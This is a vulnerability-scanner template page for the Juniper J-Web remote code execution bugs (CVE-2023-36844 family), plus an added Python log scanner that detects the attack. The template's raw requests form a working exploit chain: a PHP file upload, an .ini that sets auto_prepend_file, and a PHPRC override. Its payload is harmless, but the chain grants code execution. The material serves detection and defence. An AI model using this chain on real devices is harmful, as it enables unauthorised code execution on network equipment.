Juniper Devices - Remote Code Execution
ID: CVE-2023-36844
Severity: medium
Author: princechaddha,ritikchaddha
Tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev
Description
Multiple CVEs in Juniper Networks (CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847). A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain important environment variables. Using a crafted request, an attacker can modify certain PHP environment variables, leading to partial loss of integrity, which may allow chaining to other vulnerabilities.
YAML Source
id: CVE-2023-36844

info:
  name: Juniper Devices - Remote Code Execution
  author: princechaddha,ritikchaddha
  severity: medium
  description: |
    Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Juniper Devices.
  remediation: |
    Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability.
  reference:
    - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
    - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844
    - https://supportportal.juniper.net/JSA72300
    - http://packetstormsecurity.com/files/174397/Juniper-JunOS-SRX-EX-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-36844
    cwe-id: CWE-473
    epss-score: 0.74086
    epss-percentile: 0.98118
    cpe: cpe:2.3:h:juniper:srx100:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: juniper
    product: srx100
    shodan-query: title:"Juniper Web Device Manager"
  tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev

variables:
  string: "CVE-2023-36844"
  payload: "('<?php echo md5('{{string}}');unlink(__FILE__);?>')"

http:
  - raw:
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=do_upload&rsargs[]=[{"fileData": "data:text/html;base64,{{base64(payload)}}", "fileName": "{{rand_base(5, "abc")}}.php", "csize": {{len(payload)}}}]
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=do_upload&rsargs[]=[{"fileName": "{{rand_base(5, "abc")}}.ini", "fileData": "data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}", "csize": "97" }]
      - |
        GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"original_fileName":'
          - '"converted_fileName":'
        condition: and

      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'

    extractors:
      - type: regex
        part: body_1
        name: phpfile
        regex:
          - "([a-f0-9]{64}\\.php)"
        internal: true

      - type: regex
        part: body_2
        name: inifile
        regex:
          - "([a-f0-9]{64}\\.ini)"
        internal: true
# digest: 4a0a00473045022047f487728111d87bfcbb1056c6ed357d2d27e99c6696fe3f91ec3698f2d4b6d6022100b818eed144a9600afd50f8504f53a902056159ea017f05cb2a32a3f06a7f61f9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-36844.yaml"
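
For defenders, the template's third request is visible in web access logs: a request to /webauth_operation.php carrying a PHPRC query parameter, usually preceded by POSTs to the same endpoint. The following is an added example, not part of the template or the nuclei project; it assumes combined-log-format access logs (for instance from a reverse proxy in front of J-Web), and the sample lines and file name are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-log-format line (assumed; adapt to your proxy or WAF log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/webauth_operation.php"  # endpoint used by all three template requests


def scan(lines):
    """Return (client_ip, timestamp, reason) for each PHPRC override request."""
    findings, posters = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if unquote(url.path).lower() != ENDPOINT:
            continue
        ip = m["ip"]
        if m["method"] == "POST":
            posters.add(ip)  # may be a do_upload call; bodies are not in access logs
        # parse_qs percent-decodes values; names are upper-cased to widen the match
        query = parse_qs(url.query, keep_blank_values=True)
        params = {k.upper(): v for k, v in query.items()}
        if "PHPRC" in params:
            reason = "PHPRC override -> " + params["PHPRC"][0]
            if ip in posters:
                reason += " (after POST to same endpoint)"
            findings.append((ip, m["ts"], reason))
    return findings


# Constructed sample lines: documentation addresses, placeholder file name.
SAMPLE = [
    '192.0.2.10 - - [01/Sep/2023:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Sep/2023:10:00:05 +0000] "POST /webauth_operation.php HTTP/1.1" 200 230',
    '198.51.100.7 - - [01/Sep/2023:10:00:06 +0000] "POST /webauth_operation.php HTTP/1.1" 200 231',
    '198.51.100.7 - - [01/Sep/2023:10:00:07 +0000] "GET /webauth_operation.php?PHPRC=/var/tmp/EXAMPLE.ini HTTP/1.1" 200 64',
    '203.0.113.9 - - [01/Sep/2023:10:02:00 +0000] "GET /webauth_operation.php?phprc=%2Fvar%2Ftmp%2FEXAMPLE.ini HTTP/1.1" 200 64',
    '192.0.2.10 - - [01/Sep/2023:10:03:00 +0000] "POST /webauth_operation.php HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep=" | ")
```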